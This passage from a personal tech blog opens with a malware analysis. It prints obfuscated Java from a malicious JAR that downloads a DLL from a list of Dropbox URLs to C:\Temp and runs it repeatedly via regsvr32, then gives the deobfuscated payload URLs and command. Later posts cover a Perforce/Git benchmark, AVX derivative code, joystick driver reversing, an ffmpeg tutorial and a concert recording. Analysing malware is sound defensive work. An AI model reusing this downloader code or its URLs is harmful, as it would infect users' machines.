"302275/2675", "1101411/9747", "-3884+3982", "234498/2299", "402400/4024", "6473-6358", "3742-3640", "39984/714", "323907/3207", "26+31", "290472/5928", "4416-4369", "3708-3608", "56212/1222", "493500/4935", "4365/45", "-6149+6265", "-9227+9290", "490200/4902", "-5823+5931", "297436/4876", "7551-7502", "5293-5229", "423808/6622", "897-793", "-7916+8032", "5589-5473", "909328/8119", "-7967+8025", "-6910+6957", "-297+344", "2929-2829", "889596/8237", "9310-9264", "4811-4711", "520524/4566", "5861-5750", "430528/3844", "842702/8599", "393828/3548", "305040/2542", "8613-8496", "2302-2187", "141703/1403", "-3132+3246", "5021-4922", "925-814", "6273-6163", "-37+153", "377033/3733", "1096920/9972", "7381-7265", "8255-8209", "9546-9447", "34410/310", "60495/555", "752/16", "5600-5485", "-2588+2635", "-3180+3284", "881-833", "458900/9178", "-2808+2908", "-8996+9108", "411125/3575", "797680/6760", "804417/7247", "374132/3092", "-3703+3814", "920920/8372", "7044-6927", "-6653+6705", "4896-4777", "3179-3064", "158766/3378", "-2723+2823", "108008/2348", "378800/3788", "-3091+3188", "84448/728", "4158/66", "240500/2405", "334692/3099", "1170-1109", "-4080+4129", "-4619+4683", "320704/5011", "1164-1060", "973008/8388", "5409-5293", "1091-979", "9141-9083", "9400-9353", "132258/2814", "-8116+8216", "9072/84", "1235-1189", "-4633+4733", "466260/4090", "-267+378", "828-716", "239218/2441", "-1013+1124", "-2563+2683", "282204/2412", "-6120+6235", "2101-2000", "128478/1127", "-3313+3412", "-209+320", "4665-4555", "6356-6240", "-8404+8505", "-7696+7806", "6898-6782", "458252/9962", "-5038+5137", "633810/5710", "1939-1830", "-590+637", "8526-8411", "-9907+9954", "3061-3005", "8114-8017", "-6036+6087", "-251+367", "990784/8768", "982702/8258", "3697-3577", "-5585+5686", "7841-7739", "-8818+8924", "-8833+8955", "8662-8551", "177168/3691", "211152/3984", "8061-7948", "23970/510", "-454+554", "-8770+8816", "893900/8939", "680746/7018", "-7301+7417", "-5137+5200", "796900/7969", "262980/2435", "3583-3522", "309925/6325", "-3669+3733", "321728/5027", "3372-3268", "-1671+1787", "-2469+2585", "220416/1968", "1270-1212", "2632-2585", "166051/3533", "4436-4336", "7173-7065", "6174-6128", "3342-3242", "-2003+2117", "806-695", "-1117+1229", "101234/1033", "9313-9202", "-7006+7126", "3224-3107", "3999-3884", "-8288+8389", "1654-1540", "-8290+8389", "1540-1429", "-6272+6382", "-4157+4273", "207-106", "105380/958", "-8677+8793", "267674/5819", "2797-2698", "2528-2417", "-5027+5136", "85822/1826", "7124-7009", "160223/3409", "3950-3836", "-7987+8101", "-5176+5289", "4243-4192", "-7105+7221", "5725-5605", "-6086+6196", "139412/2681", "-6411+6526", "-5359+5457", "-9676+9794", "963696/9448", "6949-6893", "-3881+3931", "291042/2553", "-2674+2721", "237100/2371", "-7411+7457", "2447-2347", "-3285+3382", "-797+913", "480249/7623", "3561-3461", "-9865+9973", "572119/9379", "6221-6172", "101184/1581", "236096/3689", "8640-8536", "348/3", "1021148/8803", "3495-3383", "-7999+8057", "290037/6171", "8674-8627", "56400/564", "1629-1521", "6936-6890", "96200/962", "4510-4396", "156954/1414", "-4414+4526", "697662/7119", "-6591+6702", "4246-4126", "-6488+6605", "4935-4820", "7059-6958", "-4843+4957", "-707+806", "354090/3190", "-7188+7298", "-2993+3109", "10069-9968", "853820/7762", "-7397+7513", "6739-6693", "701118/7082", "-5362+5473", "60+49", "7774-7727", "414-299", "454443/9669", "5125-5008", "349468/7132", "879564/7924", "-4999+5100", "5200-5149", "-9626+9738", "382928/3419", "-2817+2924", "86926/887", "918720/9280", "-289+402", "5813-5704", "264650/5293", "-3291+3400", "7701-7648", "-2363+2410", "-8995+9095", "-8600+8646", "-3987+4087", "-3321+3418", "5793-5677", "5534-5471", "3906-3806", "-5402+5510", "370819/6079", "158613/3237" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder CYBNAFHZKEIKXPLC = new StringBuilder(FMMNX.length);
    for (int i = 0; i < FMMNX.length; i++) {
      Object MHNZLISTNGUBBLYPW = PTTQWFAFBA.eval(FMMNX[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(MHNZLISTNGUBBLYPW));
      CYBNAFHZKEIKXPLC.append((char)HOFMVNSB);
    }
    return CYBNAFHZKEIKXPLC.toString();
  }

  public static String CAHWNGGYPLSBBUUNSBJ() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] HYOZXBQ = { "1115-1048", "-6817+6875", "-3904+3996", "-5117+5209", "5298-5214", "-2006+2107", "85347/783", "-3448+3560", "538936/5858", "7300-7208" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder GPJSTAPR = new StringBuilder(HYOZXBQ.length);
    for (int i = 0; i < HYOZXBQ.length; i++) {
      Object XWHLAWQKM = PTTQWFAFBA.eval(HYOZXBQ[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(XWHLAWQKM));
      GPJSTAPR.append((char)HOFMVNSB);
    }
    return GPJSTAPR.toString();
  }

  public static String YFQZBLOYEFEJKKEZX() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] FYTFHDCQEJALCVHVO = { "5128-5060", "-2483+2569", "-8949+9034", "-2140+2228", "-906+993", "233358/5073", "3644-3577", "-1064+1134", "234868/3308" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder EXRCSQZHBXONTDCJDKHHGQXL = new StringBuilder(FYTFHDCQEJALCVHVO.length);
    for (int i = 0; i < FYTFHDCQEJALCVHVO.length; i++) {
      Object NXCJBUAWXRGTXWMAHLVXKDY = PTTQWFAFBA.eval(FYTFHDCQEJALCVHVO[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(NXCJBUAWXRGTXWMAHLVXKDY));
      EXRCSQZHBXONTDCJDKHHGQXL.append((char)HOFMVNSB);
    }
    return EXRCSQZHBXONTDCJDKHHGQXL.toString();
  }

  public static String MOXEQWXISCYNNWKTZZSFWDE() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] WNGLMMJMJETKBDUOXWG = { "5448-5334", "837-736", "-8790+8893", "3219-3104", "382084/3238", "9614-9500", "-6355+6406", "-8462+8512", "1986-1954", "8435-8388", "-245+360" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder QSPKYREOAFQCRN = new StringBuilder(WNGLMMJMJETKBDUOXWG.length);
    for (int i = 0; i < WNGLMMJMJETKBDUOXWG.length; i++) {
      Object MAGXWHPMLWCNYSQWDSMLQXDB = PTTQWFAFBA.eval(WNGLMMJMJETKBDUOXWG[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(MAGXWHPMLWCNYSQWDSMLQXDB));
      QSPKYREOAFQCRN.append((char)HOFMVNSB);
    }
    return QSPKYREOAFQCRN.toString();
  }

  public static String IBUPOZJE() throws ScriptException {
    ScriptEngineManager VZMZHYUKGXVAIYWQQBWWL = new ScriptEngineManager();
    ScriptEngine PTTQWFAFBA = VZMZHYUKGXVAIYWQQBWWL.getEngineByName("js");
    String[] AWEJEIHRHYSRQJROC = { "-9628+9692", "-2870+2934" };
    DecimalFormat dec = new DecimalFormat("#.#");
    StringBuilder CKUNUFCT = new StringBuilder(AWEJEIHRHYSRQJROC.length);
    for (int i = 0; i < AWEJEIHRHYSRQJROC.length; i++) {
      Object XUQOYXRSCEBJYGAVPNYEOX = PTTQWFAFBA.eval(AWEJEIHRHYSRQJROC[i]);
      int HOFMVNSB = Integer.parseInt(dec.format(XUQOYXRSCEBJYGAVPNYEOX));
      CKUNUFCT.append((char)HOFMVNSB);
    }
    return CKUNUFCT.toString();
  }

  public static void EEZDHQ() throws ScriptException, IOException, InterruptedException {
    int d = 0;
    while (d < 15) {
      Runtime.getRuntime().exec(MOXEQWXISCYNNWKTZZSFWDE() + " " + CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX());
      Thread.sleep(765L);
      d++;
    }
  }

  public static void WRZSTL(String TLOLIOXWCPD, String QVBBFQEDYWO) throws IOException, ScriptException, InterruptedException
  {
    InputStream WHBMGLAOEDNRJGMHKUKECXJJ = URI.create(TLOLIOXWCPD).toURL().openStream();
    Files.copy(WHBMGLAOEDNRJGMHKUKECXJJ, Paths.get(QVBBFQEDYWO, new String[0]), new CopyOption[0]);
    EEZDHQ();
  }

  public static void main(String[] args) throws Exception
  {
    new File(CAHWNGGYPLSBBUUNSBJ()).mkdir();
    File q = new File(CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX());
    if (q.exists())
    {
      EEZDHQ();
    }
    else {
      String[] VRNBQZSLUR = PACVA().split(IBUPOZJE());
      for (String DXFKOE : VRNBQZSLUR)
      {
        URL currentDXFKOE = new URL(DXFKOE);
        HttpURLConnection UKGANNEOZAGVBOQAMFBXU = (HttpURLConnection)currentDXFKOE.openConnection();
        UKGANNEOZAGVBOQAMFBXU.connect();
        if (UKGANNEOZAGVBOQAMFBXU.getResponseCode() / 100 == 2) {
          String HFCIHAULSQLBJMNFAFQ = DXFKOE;
          String CPTENFMT = CAHWNGGYPLSBBUUNSBJ() + YFQZBLOYEFEJKKEZX();
          WRZSTL(HFCIHAULSQLBJMNFAFQ, CPTENFMT);
          break;
        }
      }
    }
  }
}

Obviously, code like this will not make much sense to anybody, and it’s obvious that it was processed by some kind of an obfuscator. The presence of a HttpURLConnection object is already a red flag, though : after removing all the potentially malicious calls, and placing prints for the strings that are de-obfuscated at runtime, I got the following :

C:\\Temp\\DVUXW.CFG
regsvr32 /s C:\\Temp\\DVUXW.CFG

http://dl.dropboxusercontent.com/s/7zarvflw06m1ji6/d.dat?dl=1


http://dl.dropboxusercontent.com/s/sa3p6wrzf0zy7i0/d.dat?dl=1


http://dl.dropboxusercontent.com/s/stcwzraev6sn737/d.dat?dl=1


http://dl.dropboxusercontent.com/s/z7qwlu6a4ebur42/d.dat?dl=1


http://dl.dropboxusercontent.com/s/nahl719yv1clfgh/d.dat?dl=1


http://dl.dropboxusercontent.com/s/01eu6v9k9qdqytl/d.dat?dl=1


http://dl.dropboxusercontent.com/s/m2xqgwrovsu2r0s/d.dat?dl=1


http://dl.dropboxusercontent.com/s/xyk6wr8u398f5qu/d.dat?dl=1


http://dl.dropboxusercontent.com/s/0g26j25dmgopwgj/d.dat?dl=1


http://dl.dropboxusercontent.com/s/4b5n0u8ewyhiscu/d.dat?dl=1


http://dl.dropboxusercontent.com/s/xcy363g2g6p5h4l/d.dat?dl=1


http://dl.dropboxusercontent.com/s/ynywr9xtuzuka2l/d.dat?dl=1


http://dl.dropboxusercontent.com/s/fh96wwkglc2llc6/d.dat?dl=1


http://dl.dropboxusercontent.com/s/v9n0zyihubtkwsr/d.dat?dl=1


http://dl.dropboxusercontent.com/s/f1im03ehlktt8sg/d.dat?dl=1


http://dl.dropboxusercontent.com/s/g8e13mvq81okkex/d.dat?dl=1


http://dl.dropboxusercontent.com/s/s52kdkgliorkm0w/d.dat?dl=1


http://dl.dropboxusercontent.com/s/leadshosghvn6kg/d.dat?dl=1


http://dl.dropboxusercontent.com/s/uguzdum6pvhlgub/d.dat?dl=1


http://dl.dropboxusercontent.com/s/2gk8gv6prulwtnj/d.dat?dl=1


http://dl.dropboxusercontent.com/s/ozpa6xi3kue6tzq/d.dat?dl=1


http://dl.dropboxusercontent.com/s/blyr3qultzy6znv/d.dat?dl=1


http://dl.dropboxusercontent.com/s/nq2clxp5bp14ugm/d.dat?dl=1


http://dl.dropboxusercontent.com/s/6d4hq9mia5lamt2/d.dat?dl=1


http://dl.dropboxusercontent.com/s/3uerar72jy3gbil/d.dat?dl=1


http://dl.dropboxusercontent.com/s/avw8qqbfdsf8e91/d.dat?dl=1


http://dl.dropboxusercontent.com/s/h02dpsvoyonu4ws/d.dat?dl=1


http://dl.dropboxusercontent.com/s/8a3tqwxefjzo05q/d.dat?dl=1


http://dl.dropboxusercontent.com/s/rrq3txn4sbvf82r/d.dat?dl=1


http://dl.dropboxusercontent.com/s/u1oe3ppkbcqm2m5/d.dat?dl=1

I have to say that the obfuscator did a pretty good on scrambling these. From what I can gather, the JAR is responsible for calling regsvr32 on the DVUXW.CFG file, and download it from a Dropbox account if it’s not present on the system yet. The file itself is actually a DLL. I downloaded it and tried to dissect it on my Windows XP virtual machine, but I did not get far : it is quite big. However, it imports the most important functions from the Windows Cryptography API, as well as WriteFile. However, I was not able to see any communication attempts or socket creation inside the code, which means that this is probably not a piece of ransomware like CryptoLocker. It seems like the binary can be identified by the strings fuckoffnabs1 and myNameIsPepe present inside it. I also submitted the binary to Malwr for analysis.

Opublikowano Uncategorized | Otagowano , , , , , | 4 komentarzy

Perforce and Git : a synthetic benchmark

While at work, I needed to delete around 35000 files from a Perforce repository. Unfortunately for me (and all of us working over here), the main server is in Korea, which means that actually using the VCS is a giant PITA that most of us would like to avoid. Because of the fairly long response times, pretty much every action performed on the repository takes more or less one second. So you can easily calculate the whole time needed for deleting 35000 files : around 10 hours. I left my computer running overnight so it can peacefully complete the task.

That made me wonder : how long would that task take if Perforce was running on a local server. Also, I wanted to see how these times compare to the VCS I use more often, namely Git.

I created 35000 files containing (supposedly) random data with the following command :

for((i=0;i<35000;++i))
do
    dd if=/dev/urandom of=file$i.bin bs=$RANDOM count=1 >/dev/null 2>&1
done

$RANDOM is guaranteed to be between 0 and 32767 by Bash, so the files were maximum 32KB in size. Here are the benchmark results for git :

daniel@Jurij:~/test$ time git add .
real 0m17.467s
user 0m15.283s
sys 0m1.830s

daniel@Jurij:~/test$ time git commit -qam test
real 0m0.171s
user 0m0.097s
sys 0m0.070s

daniel@Jurij:~/test$ time git rm -rq .
real 3m42.355s
user 3m37.257s
sys 0m5.010s

daniel@Jurij:~/test$ time git commit -qam test
real 0m0.016s
user 0m0.013s
sys 0m0.000s

After seeing these numbers, I found them to be adequate. Then, I set up a Perforce server on my Ubuntu virtual machine, since Perforce offers trial versions of their software for installations which serve less than 20 users (and offer less than 20 workspaces, if you speak perforceish). After starting the server, setting up my user and the workspace, I ran these commands, of course having recreated the files beforehand.

daniel@daniel-VirtualBox:~/p4/test$ time find . -type f -exec p4 add -t binary '{}' >/dev/null +
real 0m5.572s
user 0m0.191s
sys 0m0.095s

daniel@daniel-VirtualBox:~/p4/tset$ time p4 submit -d test >/dev/null
real 1m19.138s
user 0m3.668s
sys 0m2.588s

daniel@daniel-VirtualBox:~/p4/test$ time find . -type f -exec p4 delete '{}' >/dev/null +
real 0m5.774s
user 0m0.600s
sys 0m0.528s

daniel@daniel-VirtualBox:~/p4/test$ time p4 submit -d test >/dev/null
real 0m2.817s
user 0m0.061s
sys 0m0.004s

The Perforce commandline client does not support passing wildcards, so I had to use find to help me in the task. The number of actual calls made to the application was minimized by the usage of ‚+’ instead of ‚;’ at the end of the invocation.

I did find the results quite surprising. I was expecting Git to easily trump Perforce in terms of performance, but this test quickly showed that this was clearly not the case. I still find Git much easier to use than Perforce, though. Especially considering the network lag introduced by my workplace environment, and the extra limitations put on the repository by corporate rules.

Opublikowano komputer, Uncategorized | Otagowano | 3 komentarzy

Numerical differentiation using the finite difference formula implemented with AVX

During another one of my assembly-related escapades, I came across a following problem : using the finite difference formula, create a function that would calculate the values of a given function’s derivative, given the beginning and end point to be inspected, as well as the precision, e.g. how many samples (individual values) to take in that area. The function being inspected was a simple quadratic function, given by the general formula f(x) = ax^2 + bx + c \; (a,b,c \in \mathbb{R}). Of course, it has a very trivial derivative of f'(x) = 2ax + b, but the computer doesn’t necessarily know that.

The finite difference formula can be summarized as follows : if we need to calculate n \; \in \mathbb{Z} values of a function’s derivative on the area of <a, b> \; (a,b \in \mathbb{R}), then the value of the derivative can be approximated by the following formula :

f'(x) = \frac{f(x + \Delta x) - f(x - \Delta x)}{2 \Delta x}

where \Delta x = \frac{b-a}{n}, e.g. the size of a single „step” according to the selected precision – the bigger the precision, the „smaller” the step is and thus the function is calculated with a greater granularity.

Writing some sequential code for this formula is obviously trivial. Parallelization of the computations can be a more difficult task, though. In my approach, I chose to use „masks” (couldn’t come up with a better name for these, unfortunately : they kind of resemble bitmasks, that’s why the name came to me, I guess) which represent the increments (or decrements) of their respective arguments. There are four such „masks” :

  • the „dx mask”, which contains the value of \Delta x multiplied by 8, since there are 8 values calculated in one iteration of the loop
  • the „2dx mask”, simply containing \Delta x multiplied by 2 – this is the value by which the calculated values are divided by
  • the „plus mask”, which contains the values of \Delta x multiplied by 1 to 8. This mask is used to calculate the value of $latex x + \Delta x$ in the loop, which is later used as an argument for the function.
  • the „minus mask”, which contains the values of \Delta x multiplied by -1 to 6. Analogously to the „plus mask”, it is used to calculate the value of $latex x – \Delta x$.

Each of those masks takes up a whole YMM register and is added to the current quadratic function arguments, producing new arguments for which the value of the derivative is calculated.

I do realize that this all may be quite confusing, so let me illustrate this on a diagram. It attempts to show (though poorly) what is done in one iteration of the loop.

YMM5 represents the „current position” within the function, e.g. the current argument. After adding the „plus” and „minus masks” to these values, every respective element of the resulting YMM register contains the argument to the function which corresponds to the argument required by the formula of the theorem. Therefore, after calculating the value of that function, subtracting the respective values from each other and dividing these results by 2 \Delta x, we obtain the „dval”, which is the final value of the derivative of the function at the given point. That value is written to memory. The „current position” is incremented by 8 \Delta x and the loop is executed again (unless the required number of iterations has been reached).

If there are any leftover values, they are calculated by normal sequential code, operating on one element in one iteration. The sequential loop will make at most 7 iterations, so it’s not a bottleneck by any means.

I also came across a very interesting issue related to memory performance and its correlation with the alignment of the address. All the SSE instructions required the destination (or source, in the case of using instructions operating on packed data) memory operand’s address to be 16-byte aligned. If it wasn’t aligned, a general protection fault was reported while executing that instruction. The one of the few SSE instructions that didn’t require the address to be 16-byte aligned was movups, but using non-16-byte aligned addresses resulted in a dramatic performance decrease. I found this not to be true anymore in the case of AVX. The Intel Basic Architecture manual says that

Most VEX-encoded SIMD numeric and data processing instruction semantics withmemory operand have relaxed memory alignment requirements than instructions encoded using SIMD prefixes.
(section 13.1.3)

and

With the exception of explicitly aligned 16 or 32 byte SIMD load/store instructions, most VEX-encoded, arithmetic and data processing instructions operate in a flexible environment regarding memory address alignment, i.e. VEX-encoded instruction with 32-byte or 16-byte load semantics will support unaligned load operation by default. Memory arguments for most instructions with VEX prefix operate normally without causing #GP(0) on any byte-granularity alignment (unlike Legacy SSE instructions).
(section 13.3)

I was curious to find out what kind of penalty an unaligned memory access actually introduces. In order to do that, I compared the performance of the function when the destination array was allocated via standard malloc (which is guaranteed to return an 8-byte aligned address when using glibc, I don’t know about any other libc implementations) and mmap (which returns addresses located on a page boundary, which is 4KB in case of x86). The results showed that there is a 5% increase in performance when using the address returned by mmap. I thought that this might be improved even more by changing the instruction from movups to movaps, self-modifying the instruction after checking the address’ alignment. The results were not satisfactory, though : differences in performance were negligible, around 0.041%, which most certainly can’t be considered an improvement considering all the extra code that must be added in order to allow the function to self-modify itself. So, the good news are : you can always use movups for memory transfers in AVX, since it doesn’t introduce any kind of performance penalty when the pointer is aligned, and doesn’t fail if it’s unaligned. Just keep the addresses aligned yourself and you’ll be fine.

Here’s the source of the implementation. The assembly is written using the AMD64 ABI, was compiled under gcc 4.6.3 and nasm 2.09.10. The program actually using the function is written like a benchmark : it performs 10000 executions of the function with precision 5000007, randomizing the parameters beforehand, and sums the number of ticks returned by rdtsc, writing the average number of ticks from all the iterations to stdout on exit.

Regarding my last joystick-related project : had to put it on hold until further notice. This is the kind of thing that bites you on the ass once you leave it for some time and then want to come back to it, since coming back to it takes a lot of time. I’d like to continue it, obviously, but it doesn’t seem likely nowadays.

Opublikowano komputer | Otagowano , , , , , , | Dodaj komentarz

Windows 98 DDK (Driver Development Kit) and VXD joystick drivers

In the past few days, I started working on reverse-engineering a joystick driver written for Windows 98. It’s a six-button joystick which uses the ordinary (and, of course, obsolete by today’s standards) gameport. Since the gameport provides only four actual pins for representing buttons, drivers for devices that had more buttons had to use some sort of multiplexing. The main motivation behind this is to find out what kind of multiplexing is employed – and also, hopefully, write a driver for this joystick for Linux.

The first problem related to this was finding a utility that would read the contents of the VXD file containing the driver. The format of this file is the LX/LE „Linear Executable” executable format, which was used in OS/2 and early versions of Windows before the PE format took over. Fortunately, after some googling (and trying to write my own dumper for this format) I found a great utility called DUMPLX. It’s simply amazing, and features a full disassembler of the executable contents, and disassembles VMM/VxD calls as normal instructions, which was just what I was looking for.

The second problem was finding the definitions of the constants and structures used in the program. Microsoft doesn’t distribute old DDKs anymore, but I managed to get a hold of a copy of the Windows 98 DDK, which contains all the include files that I needed to work out what all the magic numbers mean. I put it up if on my mediafire account if anybody needs it : click.

Now, back to disassembling…

Opublikowano Uncategorized | Dodaj komentarz

How to upload a song without a music video to YouTube?

Quite often, you might find yourself in a situation in which you want to upload a song to YouTube which doesn’t have an accompanying music video. YouTube, being – obviously – a video sharing site, doesn’t accept only audio files and will reject them when uploading. I was wondering if there was a simple way to create a video that would contain the album cover shown throughout the whole length of the audio track.

Of course, the most obvious solution to this would be to use a video editing tool like the Windows Movie Maker, Sony Vegas, or Adobe Premiere, but that seemed like an overkill for such a – supposedly – simple task. Fortunately, the ffmpeg project can do it all automagically in one command, which was just the solution that I was looking for.

But let’s have a look at what YouTube wants from us first so that we can upload our content in the highest possible quality. The advanced encoding specifications show that the highest audio bitrate is allowed in 720p video files and equals 384 kbps. The recommended audio codec is AAC-LC, so you can use the Nero AAC Encoder or FAAC in order to encode the audio file into AAC (hopefully, from a lossless source!).

If you’ve got your audio files ready, it’s time to start making them into YouTube-compatible 720p files so that the audio bitrate is preserved and the resulting upload has the same high quality audio track. That’s where the aforementioned ffmpeg comes in. Hold on to your seats, now.

ffmpeg -loop 1 -r 5 -i $IMAGE_FILE -i $AUDIO_FILE -c:v libx264 -preset slow -crf 18 -tune stillimage -c:a copy
-filter:v "[in] scale=-1:720, pad=1280:720:640-iw/2 [out]" -shortest output.mp4

This is the command that will take your $AUDIO_FILE, put it together with $IMAGE_FILE and produce output.mp4, which is a video file with 1280×720 resolution with the $IMAGE_FILE centered in its every frame encoded with x264, and $AUDIO_FILE as the audio track. The length of output.mp4 is equal to the length of $AUDIO_FILE.

Let us have a look at the parameters themselves, though :

  • -loop 1 states that the input files should be looped indefinitely. This is so that the video track consists of repeated frames and not just one single frame, which is what ffmpeg would do by default – and YouTube doesn’t like it, since it requires video and audio tracks to be of equal lengths.
  • -r 5 specifies the frame rate for the video track. Since our consists of just a still image, it doesn’t make sense to have the video track run at a full 25 / 23.976 fps, which would just unnecessarily enlarge the size of the resulting file. Having -r 1 makes the video track much longer than the audio track, for some bizarre reason.
  • -i $IMAGE_FILE and -i $AUDIO_FILE are both input file declarations. The format of the files and whether they’re video or audio files is detected by ffmpeg at runtime.
  • -c:v libx264 chooses libx264 as the codec used to encode the video track. Thus, the resulting data is encoded in YouTube-compatible H.264 format.
  • -preset slow -crf 18 -tune stillimage are options passed to the x264 encoder. If you want to get to the bottom of them, I suggest reading this page.
  • -c:a copy specifies that no processing whatsoever should be done to the audio track and that the track in the resulting file should be an exact copy of the input audio track.
  • -filter:v „[in] scale=-1:720, pad=1280:720:640-iw/2 [out]” is the filter specification for the output video track. Here, we specify that the input image should first be pre-scaled to be 720 pixels high, while preserving the aspect ratio. Then, we pad the scaled image (assuming „normalized” album cover dimensions, we’re now dealing with a 720×720 image) with black borders to the size of 1280×720, and put the actual image at (640-iw/2), which happens to be the middle of the image. iw is the width of the input, e.g. what’s received from the scale filter.
  • -shortest tells ffmpeg to stop encoding when the shortest encoded track ends. In our case this is the audio track, since the image is looped indefinitely.
  • output.mp4 is just the output file name. ffmpeg automagically performs all the necessary muxing and handles output to the MP4 container.

That’s pretty much all there is to it. The resulting videos can be uploaded to YouTube without any further hassle. If you’re curious how the effect looks, here’s one of the videos that I prepared that way : click.

On a side note : it is possible to skip the first step, which consists of preparing the audio files manually with an external AAC encoder, and just have it all done by ffmpeg, thus simplifying the process even more. However, support for encoding AAC in ffmpeg is experimental and the sound quality of the result usually leaves much to be desired. If you would like to try it out, though, then use the following command.

ffmpeg -loop 1 -r 5 -i $IMAGE_FILE -i $AUDIO_FILE -c:v libx264 -preset slow -crf 18 -tune stillimage -c:a aac
-b:a 384k -filter:v "[in] scale=-1:720, pad=1280:720:640-iw/2 [out]" -shortest output.mp4

Hope you found this useful,
D.K.

Opublikowano komputer | Otagowano , , , , , , | Dodaj komentarz

Hey 2012-02-12 Klub Eter, Wrocław [FLAC/MP3]

Koncert był absolutnie fenomenalny. Wszystkim fanom zespołu polecam ściągnięcie nagrania, a szczególnie posłuchanie przewspaniałej moim skromnym zdaniem wersji „Mimo wszystko”.

Nagranie dostępne w wersji MP3-V2 (na mediafire) oraz FLAC (jako torrent).

Info :

Hey
12 February 2012
Klub Eter, Wrocław
Audience Recording
Lineage : Church Audio CAFS > Tascam DR-07 (24bit/48kHz) > Sound Forge 10
(normalization, conversion to 16bit/44.1kHz, track splitting) >
FLAC v1.2.1 (-V -8) > foobar2000 v1.1.11 (tagging, ReplayGain scanning)
Lineup :
Katarzyna Nosowska - vocals
Paweł Krawczyk - guitar, trombone, backup vocals
Marcin Żabiełowicz - guitar
Jacek Chrzanowski - bass
Robert Ligiewicz - drums
Tracklisting :
01 - Fate [3:04]
02 - Muka [3:37]
03 - Umieraj stąd [3:55]
04 - A Ty? [3:47]
05 - That's a Lie [3:58]
06 - [sic!] [3:46]
07 - Cudzoziemka w raju kobiet [3:33]
08 - Piersi ćwierć [5:02]
09 - Miłość! Uwaga! Ratunku! Pomocy! [4:40]
10 - Faza delta [4:37]
11 - Z rejestru strasznych snów [3:23]
12 - Mimo wszystko [4:03]
13 - Stygnę [5:14]
14 - Teksański [2:59]
15 - Luli lali [4:41]
16 - Kto tam? Kto jest w środku? [3:30]
17 - Zazdrość [2:06]
18 - Vanitas [5:17]
19 - encore break [2:11]
20 - Boję się o nas [5:17]
21 - Cisza, ja i czas [3:28]
22 - Schizophrenic Family [2:36]
23 - Moja i Twoja nadzieja [4:27]
Info :
A concert from the 2012 winter tour by Hey. Very good setlist. Unfortunately, I
was a bit too late to get a good place and I was standing in a rather chatty
crowd, which unfortunately shows in the quieter passages and songs. There is
also a cut in "Kto tam? Kto jest w środku?" around 2:53 - sadly, it comes from
the master. The recording is rather good overall, so I hope you can enjoy it.
Please don't sell this recording in any form.
Enjoy!
-X

W razie wygaśnięcia linka lub torrenta proszę o kontakt.

Opublikowano życie | Otagowano , , , , , , | Dodaj komentarz